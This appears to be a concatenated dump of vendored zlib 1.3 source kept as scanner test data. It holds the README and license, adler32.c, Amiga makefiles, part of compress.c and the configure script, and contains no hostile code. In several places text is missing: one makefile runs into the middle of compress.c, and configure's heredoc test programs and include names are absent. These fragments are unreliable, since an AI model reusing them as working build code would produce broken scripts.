To compile all files and run the test program, follow the instructions given at the top of Makefile.in. In short "./configure; make test", and if that goes well, "make install" should work for most flavors of Unix. For Windows, use one of the special makefiles in win32/ or contrib/vstudio/ . For VMS, use make_vms.com. Questions about zlib should be sent to , or to Gilles Vollant for the Windows DLL version. The zlib home page is http://zlib.net/ . Before reporting a problem, please check this site to verify that you have the latest version of zlib; otherwise get the latest version and check whether the problem still exists or not. PLEASE read the zlib FAQ http://zlib.net/zlib_faq.html before asking for help. Mark Nelson wrote an article about zlib for the Jan. 1997 issue of Dr. Dobb's Journal; a copy of the article is available at https://marknelson.us/posts/1997/01/01/zlib-engine.html . The changes made in version 1.3 are documented in the file ChangeLog. Unsupported third party contributions are provided in directory contrib/ . zlib is available in Java using the java.util.zip package. Follow the API Documentation link at: https://docs.oracle.com/search/?q=java.util.zip . A Perl interface to zlib and bzip2 written by Paul Marquess can be found at https://github.com/pmqs/IO-Compress . A Python interface to zlib written by A.M. Kuchling is available in Python 1.5 and later versions, see http://docs.python.org/library/zlib.html . zlib is built into tcl: http://wiki.tcl.tk/4610 . An experimental package to read and write files in .zip format, written on top of zlib by Gilles Vollant , is available in the contrib/minizip directory of zlib. Notes for some targets: - For Windows DLL versions, please see win32/DLL_FAQ.txt - For 64-bit Irix, deflate.c must be compiled without any optimization. With -O, one libpng test fails. The test works in 32 bit mode (with the -n32 compiler flag). The compiler bug has been reported to SGI. - zlib doesn't work with gcc 2.6.3 on a DEC 3000/300LX under OSF/1 2.1 it works when compiled with cc. - On Digital Unix 4.0D (formerly OSF/1) on AlphaServer, the cc option -std1 is necessary to get gzprintf working correctly. This is done by configure. - zlib doesn't work on HP-UX 9.05 with some versions of /bin/cc. It works with other compilers. Use "make test" to check your compiler. - gzdopen is not supported on RISCOS or BEOS. - For PalmOs, see http://palmzlib.sourceforge.net/ Acknowledgments: The deflate format used by zlib was defined by Phil Katz. The deflate and zlib specifications were written by L. Peter Deutsch. Thanks to all the people who reported problems and suggested various improvements in zlib; they are too numerous to cite here. Copyright notice: (C) 1995-2023 Jean-loup Gailly and Mark Adler This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Jean-loup Gailly Mark Adler jloup@gzip.org madler@alumni.caltech.edu If you use the zlib library in a product, we would appreciate *not* receiving lengthy legal documents to sign. The sources are provided for free but without warranty of any kind. The library has been entirely written by Jean-loup Gailly and Mark Adler; it does not include third-party code. We make all contributions to and distributions of this project solely in our personal capacity, and are not conveying any rights to any intellectual property of any third parties. If you redistribute modified sources, we would appreciate that you include in the file ChangeLog history information documenting your changes. Please read the FAQ for more information on the distribution of modified source versions. ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/adler32.c ================================================ /* adler32.c -- compute the Adler-32 checksum of a data stream * Copyright (C) 1995-2011, 2016 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #include "zutil.h" #define BASE 65521U /* largest prime smaller than 65536 */ #define NMAX 5552 /* NMAX is the largest n such that 255n(n+1)/2 + (n+1)(BASE-1) <= 2^32-1 */ #define DO1(buf,i) {adler += (buf)[i]; sum2 += adler;} #define DO2(buf,i) DO1(buf,i); DO1(buf,i+1); #define DO4(buf,i) DO2(buf,i); DO2(buf,i+2); #define DO8(buf,i) DO4(buf,i); DO4(buf,i+4); #define DO16(buf) DO8(buf,0); DO8(buf,8); /* use NO_DIVIDE if your processor does not do division in hardware -- try it both ways to see which is faster */ #ifdef NO_DIVIDE /* note that this assumes BASE is 65521, where 65536 % 65521 == 15 (thank you to John Reiser for pointing this out) */ # define CHOP(a) \ do { \ unsigned long tmp = a >> 16; \ a &= 0xffffUL; \ a += (tmp << 4) - tmp; \ } while (0) # define MOD28(a) \ do { \ CHOP(a); \ if (a >= BASE) a -= BASE; \ } while (0) # define MOD(a) \ do { \ CHOP(a); \ MOD28(a); \ } while (0) # define MOD63(a) \ do { /* this assumes a is not negative */ \ z_off64_t tmp = a >> 32; \ a &= 0xffffffffL; \ a += (tmp << 8) - (tmp << 5) + tmp; \ tmp = a >> 16; \ a &= 0xffffL; \ a += (tmp << 4) - tmp; \ tmp = a >> 16; \ a &= 0xffffL; \ a += (tmp << 4) - tmp; \ if (a >= BASE) a -= BASE; \ } while (0) #else # define MOD(a) a %= BASE # define MOD28(a) a %= BASE # define MOD63(a) a %= BASE #endif /* ========================================================================= */ uLong ZEXPORT adler32_z(uLong adler, const Bytef *buf, z_size_t len) { unsigned long sum2; unsigned n; /* split Adler-32 into component sums */ sum2 = (adler >> 16) & 0xffff; adler &= 0xffff; /* in case user likes doing a byte at a time, keep it fast */ if (len == 1) { adler += buf[0]; if (adler >= BASE) adler -= BASE; sum2 += adler; if (sum2 >= BASE) sum2 -= BASE; return adler | (sum2 << 16); } /* initial Adler-32 value (deferred check for len == 1 speed) */ if (buf == Z_NULL) return 1L; /* in case short lengths are provided, keep it somewhat fast */ if (len < 16) { while (len--) { adler += *buf++; sum2 += adler; } if (adler >= BASE) adler -= BASE; MOD28(sum2); /* only added so many BASE's */ return adler | (sum2 << 16); } /* do length NMAX blocks -- requires just one modulo operation */ while (len >= NMAX) { len -= NMAX; n = NMAX / 16; /* NMAX is divisible by 16 */ do { DO16(buf); /* 16 sums unrolled */ buf += 16; } while (--n); MOD(adler); MOD(sum2); } /* do remaining bytes (less than NMAX, still just one modulo) */ if (len) { /* avoid modulos if none remaining */ while (len >= 16) { len -= 16; DO16(buf); buf += 16; } while (len--) { adler += *buf++; sum2 += adler; } MOD(adler); MOD(sum2); } /* return recombined sums */ return adler | (sum2 << 16); } /* ========================================================================= */ uLong ZEXPORT adler32(uLong adler, const Bytef *buf, uInt len) { return adler32_z(adler, buf, len); } /* ========================================================================= */ local uLong adler32_combine_(uLong adler1, uLong adler2, z_off64_t len2) { unsigned long sum1; unsigned long sum2; unsigned rem; /* for negative len, return invalid adler32 as a clue for debugging */ if (len2 < 0) return 0xffffffffUL; /* the derivation of this formula is left as an exercise for the reader */ MOD63(len2); /* assumes len2 >= 0 */ rem = (unsigned)len2; sum1 = adler1 & 0xffff; sum2 = rem * sum1; MOD(sum2); sum1 += (adler2 & 0xffff) + BASE - 1; sum2 += ((adler1 >> 16) & 0xffff) + ((adler2 >> 16) & 0xffff) + BASE - rem; if (sum1 >= BASE) sum1 -= BASE; if (sum1 >= BASE) sum1 -= BASE; if (sum2 >= ((unsigned long)BASE << 1)) sum2 -= ((unsigned long)BASE << 1); if (sum2 >= BASE) sum2 -= BASE; return sum1 | (sum2 << 16); } /* ========================================================================= */ uLong ZEXPORT adler32_combine(uLong adler1, uLong adler2, z_off_t len2) { return adler32_combine_(adler1, adler2, len2); } uLong ZEXPORT adler32_combine64(uLong adler1, uLong adler2, z_off64_t len2) { return adler32_combine_(adler1, adler2, len2); } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/amiga/Makefile.pup ================================================ # Amiga powerUP (TM) Makefile # makefile for libpng and SAS C V6.58/7.00 PPC compiler # Copyright (C) 1998 by Andreas R. Kleinert LIBNAME = libzip.a CC = scppc CFLAGS = NOSTKCHK NOSINT OPTIMIZE OPTGO OPTPEEP OPTINLOCAL OPTINL \ OPTLOOP OPTRDEP=8 OPTDEP=8 OPTCOMP=8 NOVER AR = ppc-amigaos-ar cr RANLIB = ppc-amigaos-ranlib LD = ppc-amigaos-ld -r LDFLAGS = -o LDLIBS = LIB:scppc.a LIB:end.o RM = delete quiet OBJS = adler32.o compress.o crc32.o gzclose.o gzlib.o gzread.o gzwrite.o \ uncompr.o deflate.o trees.o zutil.o inflate.o infback.o inftrees.o inffast.o TEST_OBJS = example.o minigzip.o all: example minigzip check: test test: all example echo hello world | minigzip | minigzip -d $(LIBNAME): $(OBJS) $(AR) $@ $(OBJS) -$(RANLIB) $@ example: example.o $(LIBNAME) $(LD) $(LDFLAGS) $@ LIB:c_ppc.o $@.o $(LIBNAME) $(LDLIBS) minigzip: minigzip.o $(LIBNAME) $(LD) $(LDFLAGS) $@ LIB:c_ppc.o $@.o $(LIBNAME) $(LDLIBS) mostlyclean: clean clean: $(RM) *.o example minigzip $(LIBNAME) foo.gz zip: zip -ul9 zlib README ChangeLog Makefile Make????.??? Makefile.?? \ descrip.mms *.[ch] tgz: cd ..; tar cfz zlib/zlib.tgz zlib/README zlib/ChangeLog zlib/Makefile \ zlib/Make????.??? zlib/Makefile.?? zlib/descrip.mms zlib/*.[ch] # DO NOT DELETE THIS LINE -- make depend depends on it. adler32.o: zlib.h zconf.h compress.o: zlib.h zconf.h crc32.o: crc32.h zlib.h zconf.h deflate.o: deflate.h zutil.h zlib.h zconf.h example.o: zlib.h zconf.h gzclose.o: zlib.h zconf.h gzguts.h gzlib.o: zlib.h zconf.h gzguts.h gzread.o: zlib.h zconf.h gzguts.h gzwrite.o: zlib.h zconf.h gzguts.h inffast.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h inflate.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h infback.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h inftrees.o: zutil.h zlib.h zconf.h inftrees.h minigzip.o: zlib.h zconf.h trees.o: deflate.h zutil.h zlib.h zconf.h trees.h uncompr.o: zlib.h zconf.h zutil.o: zutil.h zlib.h zconf.h ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/amiga/Makefile.sas ================================================ # SMakefile for zlib # Modified from the standard UNIX Makefile Copyright Jean-loup Gailly # Osma Ahvenlampi # Amiga, SAS/C 6.56 & Smake CC=sc CFLAGS=OPT #CFLAGS=OPT CPU=68030 #CFLAGS=DEBUG=LINE LDFLAGS=LIB z.lib SCOPTIONS=OPTSCHED OPTINLINE OPTALIAS OPTTIME OPTINLOCAL STRMERGE \ NOICONS PARMS=BOTH NOSTACKCHECK UTILLIB NOVERSION ERRORREXX \ DEF=POSTINC OBJS = adler32.o compress.o crc32.o gzclose.o gzlib.o gzread.o gzwrite.o \ uncompr.o deflate.o trees.o zutil.o inflate.o infback.o inftrees.o inffast.o TEST_OBJS = example.o minigzip.o all: SCOPTIONS example minigzip check: test test: all example echo hello world | minigzip | minigzip -d install: z.lib copy clone zlib.h zconf.h INCLUDE: copy clone z.lib LIB: z.lib: $(OBJS) oml z.lib r $(OBJS) example: example.o z.lib $(CC) $(CFLAGS) LINK TO $@ example.o $(LDFLAGS) minigzip: minigzip.o z.lib $(CC) $(CFLAGS) LINK TO $@ minigzip.o $(LDFLAGS) mostlyclean: clean clean: -delete force quiet example minigzip *.o z.lib foo.gz *.lnk SCOPTIONS SCOPTIONS: Makefile.sas copy to $@ (uLong)max ? max : (uInt)left; left -= stream.avail_out; } if (stream.avail_in == 0) { stream.avail_in = sourceLen > (uLong)max ? max : (uInt)sourceLen; sourceLen -= stream.avail_in; } err = deflate(&stream, sourceLen ? Z_NO_FLUSH : Z_FINISH); } while (err == Z_OK); *destLen = stream.total_out; deflateEnd(&stream); return err == Z_STREAM_END ? Z_OK : err; } /* =========================================================================== */ int ZEXPORT compress(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen) { return compress2(dest, destLen, source, sourceLen, Z_DEFAULT_COMPRESSION); } /* =========================================================================== If the default memLevel or windowBits for deflateInit() is changed, then this function needs to be updated. */ uLong ZEXPORT compressBound(uLong sourceLen) { return sourceLen + (sourceLen >> 12) + (sourceLen >> 14) + (sourceLen >> 25) + 13; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/configure ================================================ #!/bin/sh # configure script for zlib. # # Normally configure builds both a static and a shared library. # If you want to build just a static library, use: ./configure --static # # To impose specific compiler or flags or install directory, use for example: # prefix=$HOME CC=cc CFLAGS="-O4" ./configure # or for csh/tcsh users: # (setenv prefix $HOME; setenv CC cc; setenv CFLAGS "-O4"; ./configure) # Incorrect settings of CC or CFLAGS may prevent creating a shared library. # If you have problems, try without defining CC and CFLAGS before reporting # an error. # start off configure.log echo -------------------- >> configure.log echo $0 $* >> configure.log date >> configure.log # get source directory SRCDIR=`dirname $0` if test $SRCDIR = "."; then ZINC="" ZINCOUT="-I." SRCDIR="" else ZINC='-include zconf.h' ZINCOUT='-I. -I$(SRCDIR)' SRCDIR="$SRCDIR/" fi # set command prefix for cross-compilation if [ -n "${CHOST}" ]; then uname=${CHOST} mname=${CHOST} CROSS_PREFIX="${CHOST}-" else mname=`(uname -a || echo unknown) 2>/dev/null` fi # destination name for static library STATICLIB=libz.a # extract zlib version numbers from zlib.h VER=`sed -n -e '/VERSION "/s/.*"\(.*\)".*/\1/p' < ${SRCDIR}zlib.h` VER1=`sed -n -e '/VERSION "/s/.*"\([0-9]*\)\\..*/\1/p' < ${SRCDIR}zlib.h` # establish commands for library building if "${CROSS_PREFIX}ar" --version >/dev/null 2>/dev/null || test $? -lt 126; then AR=${AR-"${CROSS_PREFIX}ar"} test -n "${CROSS_PREFIX}" && echo Using ${AR} | tee -a configure.log else AR=${AR-"ar"} test -n "${CROSS_PREFIX}" && echo Using ${AR} | tee -a configure.log fi ARFLAGS=${ARFLAGS-"rc"} if "${CROSS_PREFIX}ranlib" --version >/dev/null 2>/dev/null || test $? -lt 126; then RANLIB=${RANLIB-"${CROSS_PREFIX}ranlib"} test -n "${CROSS_PREFIX}" && echo Using ${RANLIB} | tee -a configure.log else RANLIB=${RANLIB-"ranlib"} fi if "${CROSS_PREFIX}nm" --version >/dev/null 2>/dev/null || test $? -lt 126; then NM=${NM-"${CROSS_PREFIX}nm"} test -n "${CROSS_PREFIX}" && echo Using ${NM} | tee -a configure.log else NM=${NM-"nm"} fi # set defaults before processing command line options LDCONFIG=${LDCONFIG-"ldconfig"} LDSHAREDLIBC="${LDSHAREDLIBC--lc}" ARCHS= prefix=${prefix-/usr/local} exec_prefix=${exec_prefix-'${prefix}'} libdir=${libdir-'${exec_prefix}/lib'} sharedlibdir=${sharedlibdir-'${libdir}'} includedir=${includedir-'${prefix}/include'} mandir=${mandir-'${prefix}/share/man'} shared_ext='.so' shared=1 solo=0 cover=0 zprefix=0 zconst=0 build64=0 gcc=0 warn=0 debug=0 address=0 memory=0 old_cc="$CC" old_cflags="$CFLAGS" OBJC='$(OBJZ) $(OBJG)' PIC_OBJC='$(PIC_OBJZ) $(PIC_OBJG)' # leave this script, optionally in a bad way leave() { if test "$*" != "0"; then echo "** $0 aborting." | tee -a configure.log fi rm -rf $test.[co] $test $test$shared_ext $test.gcno $test.dSYM ./--version echo -------------------- >> configure.log echo >> configure.log echo >> configure.log exit $1 } # process command line options while test $# -ge 1 do case "$1" in -h* | --help) echo 'usage:' | tee -a configure.log echo ' configure [--const] [--zprefix] [--prefix=PREFIX] [--eprefix=EXPREFIX]' | tee -a configure.log echo ' [--static] [--64] [--libdir=LIBDIR] [--sharedlibdir=LIBDIR]' | tee -a configure.log echo ' [--includedir=INCLUDEDIR] [--archs="-arch i386 -arch x86_64"]' | tee -a configure.log exit 0 ;; -p*=* | --prefix=*) prefix=`echo $1 | sed 's/.*=//'`; shift ;; -e*=* | --eprefix=*) exec_prefix=`echo $1 | sed 's/.*=//'`; shift ;; -l*=* | --libdir=*) libdir=`echo $1 | sed 's/.*=//'`; shift ;; --sharedlibdir=*) sharedlibdir=`echo $1 | sed 's/.*=//'`; shift ;; -i*=* | --includedir=*) includedir=`echo $1 | sed 's/.*=//'`;shift ;; -u*=* | --uname=*) uname=`echo $1 | sed 's/.*=//'`;shift ;; -p* | --prefix) prefix="$2"; shift; shift ;; -e* | --eprefix) exec_prefix="$2"; shift; shift ;; -l* | --libdir) libdir="$2"; shift; shift ;; -i* | --includedir) includedir="$2"; shift; shift ;; -s* | --shared | --enable-shared) shared=1; shift ;; -t | --static) shared=0; shift ;; --solo) solo=1; shift ;; --cover) cover=1; shift ;; -z* | --zprefix) zprefix=1; shift ;; -6* | --64) build64=1; shift ;; -a*=* | --archs=*) ARCHS=`echo $1 | sed 's/.*=//'`; shift ;; --sysconfdir=*) echo "ignored option: --sysconfdir" | tee -a configure.log; shift ;; --localstatedir=*) echo "ignored option: --localstatedir" | tee -a configure.log; shift ;; -c* | --const) zconst=1; shift ;; -w* | --warn) warn=1; shift ;; -d* | --debug) debug=1; shift ;; --sanitize) address=1; shift ;; --address) address=1; shift ;; --memory) memory=1; shift ;; *) echo "unknown option: $1" | tee -a configure.log echo "$0 --help for help" | tee -a configure.log leave 1;; esac done # temporary file name test=ztest$$ # put arguments in log, also put test file in log if used in arguments show() { case "$*" in *$test.c*) echo === $test.c === >> configure.log cat $test.c >> configure.log echo === >> configure.log;; esac echo $* >> configure.log } # check for gcc vs. cc and set compile and link flags based on the system identified by uname cat > $test.c </dev/null 2>&1; then cc=${CROSS_PREFIX}gcc else cc=${CROSS_PREFIX}cc fi else cc=${CC} fi case "$cc" in *gcc*) gcc=1 ;; *clang*) gcc=1 ;; esac case `$cc -v 2>&1` in *gcc*) gcc=1 ;; *clang*) gcc=1 ;; esac show $cc -c $test.c if test "$gcc" -eq 1 && ($cc -c $test.c) >> configure.log 2>&1; then echo ... using gcc >> configure.log CC="$cc" CFLAGS="${CFLAGS--O3}" SFLAGS="${CFLAGS--O3} -fPIC" if test "$ARCHS"; then CFLAGS="${CFLAGS} ${ARCHS}" LDFLAGS="${LDFLAGS} ${ARCHS}" fi if test $build64 -eq 1; then CFLAGS="${CFLAGS} -m64" SFLAGS="${SFLAGS} -m64" fi if test "$warn" -eq 1; then if test "$zconst" -eq 1; then CFLAGS="${CFLAGS} -Wall -Wextra -Wcast-qual -DZLIB_CONST" else CFLAGS="${CFLAGS} -Wall -Wextra" fi fi if test $address -eq 1; then CFLAGS="${CFLAGS} -g -fsanitize=address -fno-omit-frame-pointer" fi if test $memory -eq 1; then CFLAGS="${CFLAGS} -g -fsanitize=memory -fno-omit-frame-pointer" fi if test $debug -eq 1; then CFLAGS="${CFLAGS} -DZLIB_DEBUG" SFLAGS="${SFLAGS} -DZLIB_DEBUG" fi if test -z "$uname"; then uname=`(uname -s || echo unknown) 2>/dev/null` fi case "$uname" in Linux* | linux* | *-linux* | GNU | GNU/* | solaris*) case "$mname" in *sparc*) LDFLAGS="${LDFLAGS} -Wl,--no-warn-rwx-segments" ;; esac LDSHARED=${LDSHARED-"$cc -shared -Wl,-soname,libz.so.1,--version-script,${SRCDIR}zlib.map"} ;; *BSD | *bsd* | DragonFly) LDSHARED=${LDSHARED-"$cc -shared -Wl,-soname,libz.so.1,--version-script,${SRCDIR}zlib.map"} LDCONFIG="ldconfig -m" ;; CYGWIN* | Cygwin* | cygwin* | *-cygwin* | OS/2*) EXE='.exe' ;; MINGW* | mingw* | *-mingw*) rm -f $test.[co] $test $test$shared_ext echo "If this doesn't work for you, try win32/Makefile.gcc." | tee -a configure.log LDSHARED=${LDSHARED-"$cc -shared"} LDSHAREDLIBC="" EXE='.exe' ;; QNX*) # This is for QNX6. I suppose that the QNX rule below is for QNX2,QNX4 # (alain.bonnefoy@icbt.com) LDSHARED=${LDSHARED-"$cc -shared -Wl,-hlibz.so.1"} ;; HP-UX*) LDSHARED=${LDSHARED-"$cc -shared $SFLAGS"} case `(uname -m || echo unknown) 2>/dev/null` in ia64) shared_ext='.so' SHAREDLIB='libz.so' ;; *) shared_ext='.sl' SHAREDLIB='libz.sl' ;; esac ;; AIX*) LDFLAGS="${LDFLAGS} -Wl,-brtl" ;; Darwin* | darwin* | *-darwin*) shared_ext='.dylib' SHAREDLIB=libz$shared_ext SHAREDLIBV=libz.$VER$shared_ext SHAREDLIBM=libz.$VER1$shared_ext LDSHARED=${LDSHARED-"$cc -dynamiclib -install_name $libdir/$SHAREDLIBM -compatibility_version $VER1 -current_version $VER"} if "${CROSS_PREFIX}libtool" -V 2>&1 | grep Apple > /dev/null; then AR="${CROSS_PREFIX}libtool" elif libtool -V 2>&1 | grep Apple > /dev/null; then AR="libtool" else AR="/usr/bin/libtool" fi ARFLAGS="-o" ;; *) LDSHARED=${LDSHARED-"$cc -shared"} ;; esac else # find system name and corresponding cc options CC=${CC-cc} gcc=0 echo ... using $CC >> configure.log if test -z "$uname"; then uname=`(uname -sr || echo unknown) 2>/dev/null` fi case "$uname" in HP-UX*) SFLAGS=${CFLAGS-"-O +z"} CFLAGS=${CFLAGS-"-O"} # LDSHARED=${LDSHARED-"ld -b +vnocompatwarnings"} LDSHARED=${LDSHARED-"ld -b"} case `(uname -m || echo unknown) 2>/dev/null` in ia64) shared_ext='.so' SHAREDLIB='libz.so' ;; *) shared_ext='.sl' SHAREDLIB='libz.sl' ;; esac ;; IRIX*) SFLAGS=${CFLAGS-"-ansi -O2 -rpath ."} CFLAGS=${CFLAGS-"-ansi -O2"} LDSHARED=${LDSHARED-"cc -shared -Wl,-soname,libz.so.1"} ;; OSF1\ V4*) SFLAGS=${CFLAGS-"-O -std1"} CFLAGS=${CFLAGS-"-O -std1"} LDFLAGS="${LDFLAGS} -Wl,-rpath,." LDSHARED=${LDSHARED-"cc -shared -Wl,-soname,libz.so -Wl,-msym -Wl,-rpath,$(libdir) -Wl,-set_version,${VER}:1.0"} ;; OSF1*) SFLAGS=${CFLAGS-"-O -std1"} CFLAGS=${CFLAGS-"-O -std1"} LDSHARED=${LDSHARED-"cc -shared -Wl,-soname,libz.so.1"} ;; QNX*) SFLAGS=${CFLAGS-"-4 -O"} CFLAGS=${CFLAGS-"-4 -O"} LDSHARED=${LDSHARED-"cc"} RANLIB=${RANLIB-"true"} AR="cc" ARFLAGS="-A" ;; SCO_SV\ 3.2*) SFLAGS=${CFLAGS-"-O3 -dy -KPIC "} CFLAGS=${CFLAGS-"-O3"} LDSHARED=${LDSHARED-"cc -dy -KPIC -G"} ;; SunOS\ 5* | solaris*) LDSHARED=${LDSHARED-"cc -G -h libz$shared_ext.$VER1"} SFLAGS=${CFLAGS-"-fast -KPIC"} CFLAGS=${CFLAGS-"-fast"} if test $build64 -eq 1; then # old versions of SunPRO/Workshop/Studio don't support -m64, # but newer ones do. Check for it. flag64=`$CC -flags | egrep -- '^-m64'` if test x"$flag64" != x"" ; then CFLAGS="${CFLAGS} -m64" SFLAGS="${SFLAGS} -m64" else case `(uname -m || echo unknown) 2>/dev/null` in i86*) SFLAGS="$SFLAGS -xarch=amd64" CFLAGS="$CFLAGS -xarch=amd64" ;; *) SFLAGS="$SFLAGS -xarch=v9" CFLAGS="$CFLAGS -xarch=v9" ;; esac fi fi if test -n "$ZINC"; then ZINC='-I- -I. -I$(SRCDIR)' fi ;; SunOS\ 4*) SFLAGS=${CFLAGS-"-O2 -PIC"} CFLAGS=${CFLAGS-"-O2"} LDSHARED=${LDSHARED-"ld"} ;; SunStudio\ 9*) SFLAGS=${CFLAGS-"-fast -xcode=pic32 -xtarget=ultra3 -xarch=v9b"} CFLAGS=${CFLAGS-"-fast -xtarget=ultra3 -xarch=v9b"} LDSHARED=${LDSHARED-"cc -xarch=v9b"} ;; UNIX_System_V\ 4.2.0) SFLAGS=${CFLAGS-"-KPIC -O"} CFLAGS=${CFLAGS-"-O"} LDSHARED=${LDSHARED-"cc -G"} ;; UNIX_SV\ 4.2MP) SFLAGS=${CFLAGS-"-Kconform_pic -O"} CFLAGS=${CFLAGS-"-O"} LDSHARED=${LDSHARED-"cc -G"} ;; OpenUNIX\ 5) SFLAGS=${CFLAGS-"-KPIC -O"} CFLAGS=${CFLAGS-"-O"} LDSHARED=${LDSHARED-"cc -G"} ;; AIX*) # Courtesy of dbakker@arrayasolutions.com SFLAGS=${CFLAGS-"-O -qmaxmem=8192"} CFLAGS=${CFLAGS-"-O -qmaxmem=8192"} LDSHARED=${LDSHARED-"xlc -G"} ;; # send working options for other systems to zlib@gzip.org *) SFLAGS=${CFLAGS-"-O"} CFLAGS=${CFLAGS-"-O"} LDSHARED=${LDSHARED-"cc -shared"} ;; esac fi # destination names for shared library if not defined above SHAREDLIB=${SHAREDLIB-"libz$shared_ext"} SHAREDLIBV=${SHAREDLIBV-"libz$shared_ext.$VER"} SHAREDLIBM=${SHAREDLIBM-"libz$shared_ext.$VER1"} echo >> configure.log # define functions for testing compiler and library characteristics and logging the results cat > $test.c </dev/null; then try() { show $* test "`( $* ) 2>&1 | tee -a configure.log`" = "" } echo - using any output from compiler to indicate an error >> configure.log else try() { show $* got=`( $* ) 2>&1` ret=$? if test "$got" != ""; then printf "%s\n" "$got" >> configure.log fi if test $ret -ne 0; then echo "(exit code "$ret")" >> configure.log fi return $ret } fi tryboth() { show $* got=`( $* ) 2>&1` ret=$? if test "$got" != ""; then printf "%s\n" "$got" >> configure.log fi if test $ret -ne 0; then echo "(exit code "$ret")" >> configure.log return $ret fi test "$got" = "" } cat > $test.c << EOF int foo() { return 0; } EOF echo "Checking for obsessive-compulsive compiler options..." >> configure.log if try $CC -c $CFLAGS $test.c; then : else echo "Compiler error reporting is too harsh for $0 (perhaps remove -Werror)." | tee -a configure.log leave 1 fi echo >> configure.log # see if shared library build supported cat > $test.c <> configure.log # check for size_t cat > $test.c < #include size_t dummy = 0; EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for size_t... Yes." | tee -a configure.log else echo "Checking for size_t... No." | tee -a configure.log # find a size_t integer type # check for long long cat > $test.c << EOF long long dummy = 0; EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for long long... Yes." | tee -a configure.log cat > $test.c < int main(void) { if (sizeof(void *) <= sizeof(int)) puts("int"); else if (sizeof(void *) <= sizeof(long)) puts("long"); else puts("z_longlong"); return 0; } EOF else echo "Checking for long long... No." | tee -a configure.log cat > $test.c < int main(void) { if (sizeof(void *) <= sizeof(int)) puts("int"); else puts("long"); return 0; } EOF fi if try $CC $CFLAGS -o $test $test.c; then sizet=`./$test` echo "Checking for a pointer-size integer type..." $sizet"." | tee -a configure.log CFLAGS="${CFLAGS} -DNO_SIZE_T=${sizet}" SFLAGS="${SFLAGS} -DNO_SIZE_T=${sizet}" else echo "Checking for a pointer-size integer type... not found." | tee -a configure.log fi fi echo >> configure.log # check for large file support, and if none, check for fseeko() cat > $test.c < off64_t dummy = 0; EOF if try $CC -c $CFLAGS -D_LARGEFILE64_SOURCE=1 $test.c; then CFLAGS="${CFLAGS} -D_LARGEFILE64_SOURCE=1" SFLAGS="${SFLAGS} -D_LARGEFILE64_SOURCE=1" ALL="${ALL} all64" TEST="${TEST} test64" echo "Checking for off64_t... Yes." | tee -a configure.log echo "Checking for fseeko... Yes." | tee -a configure.log else echo "Checking for off64_t... No." | tee -a configure.log echo >> configure.log cat > $test.c < int main(void) { fseeko(NULL, 0, 0); return 0; } EOF if try $CC $CFLAGS -o $test $test.c; then echo "Checking for fseeko... Yes." | tee -a configure.log else CFLAGS="${CFLAGS} -DNO_FSEEKO" SFLAGS="${SFLAGS} -DNO_FSEEKO" echo "Checking for fseeko... No." | tee -a configure.log fi fi echo >> configure.log # check for strerror() for use by gz* functions cat > $test.c < #include int main() { return strlen(strerror(errno)); } EOF if try $CC $CFLAGS -o $test $test.c; then echo "Checking for strerror... Yes." | tee -a configure.log else CFLAGS="${CFLAGS} -DNO_STRERROR" SFLAGS="${SFLAGS} -DNO_STRERROR" echo "Checking for strerror... No." | tee -a configure.log fi # copy clean zconf.h for subsequent edits cp -p ${SRCDIR}zconf.h.in zconf.h echo >> configure.log # check for unistd.h and save result in zconf.h cat > $test.c < int main() { return 0; } EOF if try $CC -c $CFLAGS $test.c; then sed < zconf.h "/^#ifdef HAVE_UNISTD_H.* may be/s/def HAVE_UNISTD_H\(.*\) may be/ 1\1 was/" > zconf.temp.h mv zconf.temp.h zconf.h echo "Checking for unistd.h... Yes." | tee -a configure.log else echo "Checking for unistd.h... No." | tee -a configure.log fi echo >> configure.log # check for stdarg.h and save result in zconf.h cat > $test.c < int main() { return 0; } EOF if try $CC -c $CFLAGS $test.c; then sed < zconf.h "/^#ifdef HAVE_STDARG_H.* may be/s/def HAVE_STDARG_H\(.*\) may be/ 1\1 was/" > zconf.temp.h mv zconf.temp.h zconf.h echo "Checking for stdarg.h... Yes." | tee -a configure.log else echo "Checking for stdarg.h... No." | tee -a configure.log fi # if the z_ prefix was requested, save that in zconf.h if test $zprefix -eq 1; then sed < zconf.h "/#ifdef Z_PREFIX.* may be/s/def Z_PREFIX\(.*\) may be/ 1\1 was/" > zconf.temp.h mv zconf.temp.h zconf.h echo >> configure.log echo "Using z_ prefix on all symbols." | tee -a configure.log fi # if --solo compilation was requested, save that in zconf.h and remove gz stuff from object lists if test $solo -eq 1; then sed '/#define ZCONF_H/a\ #define Z_SOLO ' < zconf.h > zconf.temp.h mv zconf.temp.h zconf.h OBJC='$(OBJZ)' PIC_OBJC='$(PIC_OBJZ)' fi # if code coverage testing was requested, use older gcc if defined, e.g. "gcc-4.2" on Mac OS X if test $cover -eq 1; then CFLAGS="${CFLAGS} -fprofile-arcs -ftest-coverage" if test -n "$GCC_CLASSIC"; then CC=$GCC_CLASSIC fi fi echo >> configure.log # conduct a series of tests to resolve eight possible cases of using "vs" or "s" printf functions # (using stdarg or not), with or without "n" (proving size of buffer), and with or without a # return value. The most secure result is vsnprintf() with a return value. snprintf() with a # return value is secure as well, but then gzprintf() will be limited to 20 arguments. cat > $test.c < #include #include "zconf.h" int main() { #ifndef STDC choke me #endif return 0; } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking whether to use vs[n]printf() or s[n]printf()... using vs[n]printf()." | tee -a configure.log echo >> configure.log cat > $test.c < 